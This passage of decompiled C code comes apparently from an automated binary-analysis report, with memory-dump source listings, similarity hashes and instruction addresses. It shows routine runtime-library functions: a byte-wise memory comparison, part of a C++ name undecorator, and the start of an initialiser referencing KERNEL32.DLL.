                  								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
                  									_t284 = 0;
                  									L55:
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									_t191 =  *(_t177 - 8);
                  									if(_t191 ==  *(_t181 - 8)) {
                  										_t284 = 0;
                  										L66:
                  										if(_t284 != 0) {
                  											goto L1;
                  										}
                  										_t192 =  *(_t177 - 4);
                  										if(_t192 ==  *(_t181 - 4)) {
                  											_t178 = 0;
                  											L78:
                  											if(_t178 == 0) {
                  												_t178 = 0;
                  											}
                  											L80:
                  											return _t178;
                  										}
                  										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
                  										if(_t287 == 0) {
                  											L70:
                  											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
                  											if(_t289 == 0) {
                  												L72:
                  												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
                  												if(_t291 == 0) {
                  													L75:
                  													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
                  													if(_t178 != 0) {
                  														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
                  													}
                  													goto L78;
                  												}
                  												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
                  												if(_t198 == 0) {
                  													goto L75;
                  												}
                  												L74:
                  												_t178 = _t198;
                  												goto L78;
                  											}
                  											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
                  											if(_t198 != 0) {
                  												goto L74;
                  											}
                  											goto L72;
                  										}
                  										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
                  										if(_t198 != 0) {
                  											goto L74;
                  										}
                  										goto L70;
                  									}
                  									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
                  									if(_t293 == 0) {
                  										L59:
                  										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
                  										if(_t295 == 0) {
                  											L61:
                  											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
                  											if(_t297 == 0) {
                  												L63:
                  												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
                  												if(_t284 != 0) {
                  													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  												}
                  												goto L66;
                  											}
                  											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
                  											if(_t284 != 0) {
                  												goto L1;
                  											}
                  											goto L63;
                  										}
                  										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
                  										if(_t284 != 0) {
                  											goto L1;
                  										}
                  										goto L61;
                  									}
                  									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									goto L59;
                  								}
                  								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
                  								if(_t300 == 0) {
                  									L48:
                  									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
                  									if(_t302 == 0) {
                  										L50:
                  										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
                  										if(_t304 == 0) {
                  											L52:
                  											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
                  											if(_t284 != 0) {
                  												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  											}
                  											goto L55;
                  										}
                  										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
                  										if(_t284 != 0) {
                  											goto L1;
                  										}
                  										goto L52;
                  									}
                  									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									goto L50;
                  								}
                  								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								goto L48;
                  							}
                  							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
                  							if(_t307 == 0) {
                  								L37:
                  								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
                  								if(_t309 == 0) {
                  									L39:
                  									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
                  									if(_t311 == 0) {
                  										L41:
                  										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
                  										if(_t284 != 0) {
                  											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  										}
                  										goto L44;
                  									}
                  									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									goto L41;
                  								}
                  								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								goto L39;
                  							}
                  							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							goto L37;
                  						}
                  						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
                  						if(_t314 == 0) {
                  							L26:
                  							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
                  							if(_t316 == 0) {
                  								L28:
                  								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
                  								if(_t318 == 0) {
                  									L30:
                  									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
                  									if(_t284 != 0) {
                  										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  									}
                  									goto L33;
                  								}
                  								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								goto L30;
                  							}
                  							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							goto L28;
                  						}
                  						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                  						if(_t284 != 0) {
                  							goto L1;
                  						}
                  						goto L26;
                  					}
                  					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
                  					if(_t321 == 0) {
                  						L15:
                  						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
                  						if(_t323 == 0) {
                  							L17:
                  							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
                  							if(_t325 == 0) {
                  								L19:
                  								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
                  								if(_t284 != 0) {
                  									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  								}
                  								goto L22;
                  							}
                  							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							goto L19;
                  						}
                  						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                  						if(_t284 != 0) {
                  							goto L1;
                  						}
                  						goto L17;
                  					}
                  					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                  					if(_t284 != 0) {
                  						goto L1;
                  					}
                  					goto L15;
                  				} else {
                  					__esi = __dl & 0x000000ff;
                  					__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  					if(__esi == 0) {
                  						L4:
                  						__esi =  *(__eax - 0x1b) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  						if(__esi == 0) {
                  							L6:
                  							__esi =  *(__eax - 0x1a) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                  							if(__esi == 0) {
                  								L8:
                  								__esi =  *(__eax - 0x19) & 0x000000ff;
                  								__edx =  *(__ecx - 0x19) & 0x000000ff;
                  								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L11;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L8;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L6;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L4;
                  				}
                  				L1:
                  				_t178 = _t284;
                  				goto L80;
                  			}































                  0x0042050d
                  0x0042050d
                  0x00420513
                  0x00420586
                  0x00420588
                  0x0042058a
                  0x00000000
                  0x00000000
                  0x00420590
                  0x00420596
                  0x00420615
                  0x00420617
                  0x00420619
                  0x00000000
                  0x00000000
                  0x0042061f
                  0x00420625
                  0x004206a4
                  0x004206a6
                  0x004206a8
                  0x00000000
                  0x00000000
                  0x004206ae
                  0x004206b4
                  0x00420733
                  0x00420735
                  0x00420737
                  0x00000000
                  0x00000000
                  0x00420743
                  0x004207c3
                  0x004207c5
                  0x004207c7
                  0x00000000
                  0x00000000
                  0x004207cd
                  0x004207d3
                  0x00420852
                  0x00420854
                  0x00420856
                  0x00000000
                  0x00000000
                  0x0042085c
                  0x00420862
                  0x004208d3
                  0x004208d5
                  0x004208d7
                  0x004208d9
                  0x004208d9
                  0x004208db
                  0x00421637
                  0x00421637
                  0x0042086b
                  0x0042086d
                  0x0042087e
                  0x00420886
                  0x00420888
                  0x00420899
                  0x004208a1
                  0x004208a3
                  0x004208b8
                  0x004208c0
                  0x004208c2
                  0x004208cf
                  0x004208cf
                  0x00000000
                  0x004208c2
                  0x004208ac
                  0x004208b2
                  0x00000000
                  0x00000000
                  0x004208b4
                  0x004208b4
                  0x00000000
                  0x004208b4
                  0x00420891
                  0x00420897
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420897
                  0x00420876
                  0x0042087c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042087c
                  0x004207dc
                  0x004207de
                  0x004207f5
                  0x004207fd
                  0x004207ff
                  0x00420816
                  0x0042081e
                  0x00420820
                  0x00420837
                  0x0042083f
                  0x00420841
                  0x0042084e
                  0x0042084e
                  0x00000000
                  0x00420841
                  0x0042082d
                  0x00420831
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420831
                  0x0042080c
                  0x00420810
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420810
                  0x004207eb
                  0x004207ef
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004207ef
                  0x0042074d
                  0x0042074f
                  0x00420766
                  0x0042076e
                  0x00420770
                  0x00420787
                  0x0042078f
                  0x00420791
                  0x004207a8
                  0x004207b0
                  0x004207b2
                  0x004207bf
                  0x004207bf
                  0x00000000
                  0x004207b2
                  0x0042079e
                  0x004207a2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004207a2
                  0x0042077d
                  0x00420781
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420781
                  0x0042075c
                  0x00420760
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420760
                  0x004206bd
                  0x004206bf
                  0x004206d6
                  0x004206de
                  0x004206e0
                  0x004206f7
                  0x004206ff
                  0x00420701
                  0x00420718
                  0x00420720
                  0x00420722
                  0x0042072f
                  0x0042072f
                  0x00000000
                  0x00420722
                  0x0042070e
                  0x00420712
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420712
                  0x004206ed
                  0x004206f1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004206f1
                  0x004206cc
                  0x004206d0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004206d0
                  0x0042062e
                  0x00420630
                  0x00420647
                  0x0042064f
                  0x00420651
                  0x00420668
                  0x00420670
                  0x00420672
                  0x00420689
                  0x00420691
                  0x00420693
                  0x004206a0
                  0x004206a0
                  0x00000000
                  0x00420693
                  0x0042067f
                  0x00420683
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420683
                  0x0042065e
                  0x00420662
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420662
                  0x0042063d
                  0x00420641
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420641
                  0x0042059f
                  0x004205a1
                  0x004205b8
                  0x004205c0
                  0x004205c2
                  0x004205d9
                  0x004205e1
                  0x004205e3
                  0x004205fa
                  0x00420602
                  0x00420604
                  0x00420611
                  0x00420611
                  0x00000000
                  0x00420604
                  0x004205f0
                  0x004205f4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004205f4
                  0x004205cf
                  0x004205d3
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004205d3
                  0x004205ae
                  0x004205b2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420515
                  0x00420515
                  0x00420518
                  0x0042051c
                  0x0042051e
                  0x00420531
                  0x00420531
                  0x00420535
                  0x00420539
                  0x0042053b
                  0x0042054e
                  0x0042054e
                  0x00420552
                  0x00420556
                  0x00420558
                  0x0042056b
                  0x0042056b
                  0x0042056f
                  0x00420573
                  0x00420575
                  0x0042057b
                  0x0042057e
                  0x00420582
                  0x00420582
                  0x00000000
                  0x00420575
                  0x0042055e
                  0x00420561
                  0x00420565
                  0x00420569
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420569
                  0x00420541
                  0x00420544
                  0x00420548
                  0x0042054c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042054c
                  0x00420524
                  0x00420527
                  0x0042052b
                  0x0042052f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042052f
                  0x00420506
                  0x00420506
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction ID: 03c660ef3c6cc9c18a98ddc921c7bc2ad25367a27bbd1fd26e0d4ee2ddb72157
                  • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction Fuzzy Hash: B7C18E73E0A9B34A8735852D615822FEEE26FD174035EC7A2CCD03F38AD12A9D419AD4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E0041A2C7(void* __edx, intOrPtr* _a4, signed int* _a8) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				intOrPtr _v24;
                  				char _v28;
                  				char _v36;
                  				char _v44;
                  				char _v52;
                  				intOrPtr* _t90;
                  				intOrPtr* _t91;
                  				unsigned int _t94;
                  				signed char _t96;
                  				void* _t98;
                  				signed int _t100;
                  				signed int _t110;
                  				unsigned int _t112;
                  				signed char _t114;
                  				intOrPtr* _t119;
                  				void* _t129;
                  				intOrPtr* _t130;
                  				intOrPtr* _t136;
                  				unsigned int _t138;
                  				void* _t142;
                  				void* _t149;
                  				signed int* _t150;
                  				intOrPtr* _t154;
                  				char* _t156;
                  				signed int* _t159;
                  				intOrPtr* _t161;
                  				signed int _t162;
                  				signed int _t165;
                  				void* _t168;
                  				signed int* _t170;
                  				void* _t176;
                  				signed char _t185;
                  				void* _t194;
                  				void* _t218;
                  				signed int _t221;
                  				signed int* _t224;
                  				signed int _t225;
                  				void* _t227;
                  				void* _t228;
                  				void* _t230;
                  
                  				_t218 = __edx;
                  				_t90 =  *0x451258; // 0x0
                  				_t189 =  *_t90;
                  				_t228 = _t227 - 0x30;
                  				if(_t189 != 0) {
                  					__eflags = _t189 - 0x36;
                  					if(_t189 < 0x36) {
                  						L5:
                  						__eflags = _t189 - 0x5f;
                  						if(_t189 == 0x5f) {
                  							goto L7;
                  						} else {
                  							E00416DBC(_a4, 2);
                  							goto L2;
                  						}
                  					} else {
                  						__eflags = _t189 - 0x39;
                  						if(_t189 <= 0x39) {
                  							L7:
                  							_t185 = _t189 - 0x36;
                  							_t91 = _t90 + 1;
                  							 *0x451258 = _t91;
                  							__eflags = _t185 - 0x29;
                  							if(_t185 != 0x29) {
                  								__eflags = _t185;
                  								if(_t185 < 0) {
                  									goto L15;
                  								} else {
                  									__eflags = _t185 - 3;
                  									goto L14;
                  								}
                  								goto L16;
                  							} else {
                  								_t189 =  *_t91;
                  								__eflags = _t189;
                  								if(_t189 == 0) {
                  									E004177E3(_t189, _a4, 1, _a8);
                  									goto L18;
                  								} else {
                  									_t185 = _t189 - 0x3d;
                  									__eflags = _t185 - 4;
                  									 *0x451258 = _t91 + 1;
                  									if(_t185 < 4) {
                  										L15:
                  										_t185 = _t185 | 0xffffffff;
                  										__eflags = _t185;
                  									} else {
                  										__eflags = _t185 - 7;
                  										L14:
                  										if(__eflags > 0) {
                  											goto L15;
                  										}
                  									}
                  									L16:
                  									__eflags = _t185 - 0xffffffff;
                  									if(_t185 != 0xffffffff) {
                  										_v20 = _v20 & 0x00000000;
                  										_v16 = _v16 & 0xffff0000;
                  										_t224 = _a8;
                  										_v12 =  *_t224;
                  										_t221 = _t185 & 0x00000002;
                  										__eflags = _t221;
                  										_v8 = _t224[1];
                  										if(_t221 == 0) {
                  											L27:
                  											__eflags = _t185 & 0x00000004;
                  											if((_t185 & 0x00000004) != 0) {
                  												_t138 =  *0x451268; // 0x0
                  												__eflags =  !(_t138 >> 1) & 0x00000001;
                  												if(__eflags == 0) {
                  													_t142 = E0041920C(_t218, __eflags,  &_v52);
                  													_t189 =  &_v12;
                  													E004169B3( &_v12, _t142);
                  												} else {
                  													_t149 = E004177BF(_t189,  &_v36, 0x20, E0041920C(_t218, __eflags,  &_v44));
                  													_t228 = _t228 + 0x10;
                  													_t150 = E0041756B(_t149,  &_v52,  &_v12);
                  													_t189 =  *_t150;
                  													_v12 =  *_t150;
                  													_v8 = _t150[1];
                  												}
                  											}
                  											_t94 =  *0x451268; // 0x0
                  											_t96 =  !(_t94 >> 1);
                  											__eflags = _t96 & 0x00000001;
                  											if((_t96 & 0x00000001) == 0) {
                  												_t98 = E00417488(_t189,  &_v52);
                  												_t191 =  &_v12;
                  												E004169B3( &_v12, _t98);
                  											} else {
                  												_t136 = E0041756B(E00417488(_t189,  &_v44),  &_v52,  &_v12);
                  												_t191 =  *_t136;
                  												_v12 =  *_t136;
                  												_v8 =  *((intOrPtr*)(_t136 + 4));
                  											}
                  											__eflags =  *_t224;
                  											if( *_t224 != 0) {
                  												_t129 = E004177BF(_t191,  &_v44, 0x28,  &_v12);
                  												_t228 = _t228 + 0xc;
                  												_t130 = E0041782B(_t129,  &_v52, 0x29);
                  												_v12 =  *_t130;
                  												_v8 =  *((intOrPtr*)(_t130 + 4));
                  											}
                  											_t100 = E00416833(0x451238, 8, 0);
                  											__eflags = _t100;
                  											if(_t100 == 0) {
                  												_t225 = 0;
                  												__eflags = 0;
                  											} else {
                  												 *(_t100 + 4) = 0;
                  												 *(_t100 + 4) =  *(_t100 + 4) & 0xffff00ff;
                  												 *_t100 = 0;
                  												_t225 = _t100;
                  											}
                  											E00417055( &_v28, _t225);
                  											_pop(_t194);
                  											E004173A9( &_v12, E0041782B(E004177BF(_t194,  &_v36, 0x28, E00417A99(_t194,  &_v44)),  &_v52, 0x29));
                  											_t110 =  *0x451268; // 0x0
                  											__eflags = (_t110 & 0x00000060) - 0x60;
                  											if((_t110 & 0x00000060) != 0x60) {
                  												__eflags = _t221;
                  												if(_t221 != 0) {
                  													E004173A9( &_v12,  &_v20);
                  												}
                  											}
                  											_t112 =  *0x451268; // 0x0
                  											_t114 =  !(_t112 >> 8);
                  											__eflags = _t114 & 0x00000001;
                  											_push( &_v52);
                  											if((_t114 & 0x00000001) == 0) {
                  												E004169B3( &_v12, E00417B75());
                  											} else {
                  												E004173A9( &_v12, E00417B75());
                  											}
                  											__eflags = _t225;
                  											if(_t225 == 0) {
                  												_push(3);
                  												goto L51;
                  											} else {
                  												 *_t225 = _v12;
                  												 *((intOrPtr*)(_t225 + 4)) = _v8;
                  												_t119 = _a4;
                  												 *_t119 = _v28;
                  												 *((intOrPtr*)(_t119 + 4)) = _v24;
                  											}
                  										} else {
                  											_t154 = E00417807(_t189,  &_v36, "::",  &_v12);
                  											_t211 =  *_t154;
                  											_v8 =  *((intOrPtr*)(_t154 + 4));
                  											_t156 =  *0x451258; // 0x0
                  											_t230 = _t228 + 0xc;
                  											__eflags =  *_t156;
                  											_v12 =  *_t154;
                  											_push( &_v12);
                  											if( *_t156 == 0) {
                  												_push(1);
                  												_push( &_v52);
                  												_t159 = E004177E3(_t211);
                  												_t228 = _t230 + 0xc;
                  											} else {
                  												_t176 = E004177BF(_t211,  &_v52, 0x20, E0041A057(_t218));
                  												_t228 = _t230 + 0x10;
                  												_t159 = E0041756B(_t176,  &_v44,  &_v36);
                  											}
                  											_t212 =  *_t159;
                  											_v8 = _t159[1];
                  											_t161 =  *0x451258; // 0x0
                  											_t162 =  *_t161;
                  											_v12 =  *_t159;
                  											__eflags = _t162;
                  											if(_t162 == 0) {
                  												E004177E3(_t212, _a4, 1,  &_v12);
                  												goto L52;
                  											} else {
                  												__eflags = _t162 - 0x40;
                  												if(_t162 != 0x40) {
                  													_push(2);
                  													L51:
                  													E00416DBC(_a4);
                  													L52:
                  													_t119 = _a4;
                  												} else {
                  													_t165 =  *0x451268; // 0x0
                  													 *0x451258 =  *0x451258 + 1;
                  													__eflags = (_t165 & 0x00000060) - 0x60;
                  													_push( &_v52);
                  													if((_t165 & 0x00000060) == 0x60) {
                  														_t168 = E00416CE5();
                  														_t189 =  &_v20;
                  														E004169B3( &_v20, _t168);
                  													} else {
                  														_t170 = E00416CE5();
                  														_t189 =  *_t170;
                  														_v20 =  *_t170;
                  														_v16 = _t170[1];
                  													}
                  													goto L27;
                  												}
                  											}
                  										}
                  									} else {
                  										E00416DBC(_a4, 2);
                  										L18:
                  										_t119 = _a4;
                  									}
                  								}
                  							}
                  							return _t119;
                  						} else {
                  							goto L5;
                  						}
                  					}
                  				} else {
                  					E004177E3(_t189, _a4, 1, _a8);
                  					L2:
                  					return _a4;
                  				}
                  			}















































                  0x0041a2c7
                  0x0041a2cc
                  0x0041a2d1
                  0x0041a2d3
                  0x0041a2d8
                  0x0041a2ef
                  0x0041a2f2
                  0x0041a2f9
                  0x0041a2f9
                  0x0041a2fc
                  0x00000000
                  0x0041a2fe
                  0x0041a303
                  0x00000000
                  0x0041a303
                  0x0041a2f4
                  0x0041a2f4
                  0x0041a2f7
                  0x0041a30a
                  0x0041a30e
                  0x0041a311
                  0x0041a312
                  0x0041a317
                  0x0041a31a
                  0x0041a34a
                  0x0041a34c
                  0x00000000
                  0x0041a34e
                  0x0041a34e
                  0x00000000
                  0x0041a34e
                  0x00000000
                  0x0041a31c
                  0x0041a31c
                  0x0041a31e
                  0x0041a320
                  0x0041a340
                  0x00000000
                  0x0041a322
                  0x0041a325
                  0x0041a329
                  0x0041a32c
                  0x0041a331
                  0x0041a353
                  0x0041a353
                  0x0041a353
                  0x0041a333
                  0x0041a333
                  0x0041a351
                  0x0041a351
                  0x00000000
                  0x00000000
                  0x0041a351
                  0x0041a356
                  0x0041a356
                  0x0041a359
                  0x0041a36d
                  0x0041a371
                  0x0041a379
                  0x0041a37f
                  0x0041a387
                  0x0041a387
                  0x0041a38a
                  0x0041a38d
                  0x0041a43d
                  0x0041a43d
                  0x0041a440
                  0x0041a446
                  0x0041a44f
                  0x0041a451
                  0x0041a4b9
                  0x0041a4c0
                  0x0041a4c3
                  0x0041a453
                  0x0041a46b
                  0x0041a470
                  0x0041a475
                  0x0041a47a
                  0x0041a47f
                  0x0041a482
                  0x0041a482
                  0x0041a451
                  0x0041a4c8
                  0x0041a4cf
                  0x0041a4d1
                  0x0041a4d3
                  0x0041a4ff
                  0x0041a506
                  0x0041a509
                  0x0041a4d5
                  0x0041a4e9
                  0x0041a4ee
                  0x0041a4f3
                  0x0041a4f6
                  0x0041a4f6
                  0x0041a510
                  0x0041a512
                  0x0041a524
                  0x0041a529
                  0x0041a52e
                  0x0041a538
                  0x0041a53b
                  0x0041a53b
                  0x0041a546
                  0x0041a54b
                  0x0041a54d
                  0x0041a560
                  0x0041a560
                  0x0041a54f
                  0x0041a54f
                  0x0041a553
                  0x0041a55a
                  0x0041a55c
                  0x0041a55c
                  0x0041a567
                  0x0041a56d
                  0x0041a597
                  0x0041a59c
                  0x0041a5a4
                  0x0041a5a6
                  0x0041a5a8
                  0x0041a5aa
                  0x0041a5b3
                  0x0041a5b3
                  0x0041a5aa
                  0x0041a5b8
                  0x0041a5c0
                  0x0041a5c2
                  0x0041a5c7
                  0x0041a5c8
                  0x0041a5e5
                  0x0041a5ca
                  0x0041a5d4
                  0x0041a5d4
                  0x0041a5ea
                  0x0041a5ec
                  0x0041a609
                  0x00000000
                  0x0041a5ee
                  0x0041a5f1
                  0x0041a5f6
                  0x0041a5fc
                  0x0041a5ff
                  0x0041a604
                  0x0041a604
                  0x0041a393
                  0x0041a3a0
                  0x0041a3a5
                  0x0041a3aa
                  0x0041a3ad
                  0x0041a3b2
                  0x0041a3b5
                  0x0041a3bb
                  0x0041a3be
                  0x0041a3bf
                  0x0041a3e9
                  0x0041a3eb
                  0x0041a3ec
                  0x0041a3f1
                  0x0041a3c1
                  0x0041a3d5
                  0x0041a3da
                  0x0041a3df
                  0x0041a3df
                  0x0041a3f4
                  0x0041a3f9
                  0x0041a3fc
                  0x0041a401
                  0x0041a403
                  0x0041a406
                  0x0041a408
                  0x0041a4a8
                  0x00000000
                  0x0041a40e
                  0x0041a40e
                  0x0041a410
                  0x0041a498
                  0x0041a60b
                  0x0041a60e
                  0x0041a613
                  0x0041a613
                  0x0041a416
                  0x0041a416
                  0x0041a41b
                  0x0041a424
                  0x0041a429
                  0x0041a42a
                  0x0041a487
                  0x0041a48e
                  0x0041a491
                  0x0041a42c
                  0x0041a42c
                  0x0041a432
                  0x0041a437
                  0x0041a43a
                  0x0041a43a
                  0x00000000
                  0x0041a42a
                  0x0041a410
                  0x0041a408
                  0x0041a35b
                  0x0041a360
                  0x0041a365
                  0x0041a365
                  0x0041a365
                  0x0041a359
                  0x0041a320
                  0x0041a61a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041a2f7
                  0x0041a2da
                  0x0041a2e2
                  0x0041a2ea
                  0x0041a2ee
                  0x0041a2ee

                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: operator+$NameName::$Decorator::getName::operator+$ThisType$Name::operator|=Scope
                  • String ID:
                  • API String ID: 398566123-0
                  • Opcode ID: ff38cd19dd91b43b892d78873fea5212fb9c573c3c8ebf9f76cd3c8a6541c70d
                  • Instruction ID: 7ff60aafb26cf4e29bd4d62d35c9de8c198d3cfcbef095173d456e88713f6a6d
                  • Opcode Fuzzy Hash: ff38cd19dd91b43b892d78873fea5212fb9c573c3c8ebf9f76cd3c8a6541c70d
                  • Instruction Fuzzy Hash: 9FB19171904208AFCB00EFA4D885EEE77B8AF08304F14416BF515E7291DB38DAC5CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E004067EF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				struct HINSTANCE__* _t23;
                  				intOrPtr _t28;
                  				intOrPtr _t32;
                  				intOrPtr _t45;
                  				void* _t46;
                  
                  				_t35 = __ebx;
                  				_push(0xc);
                  				_push(0x47df70);
                  				E004041C4(__ebx, __edi, __esi);
                  				_t44 = L"KERNEL32.DLL";
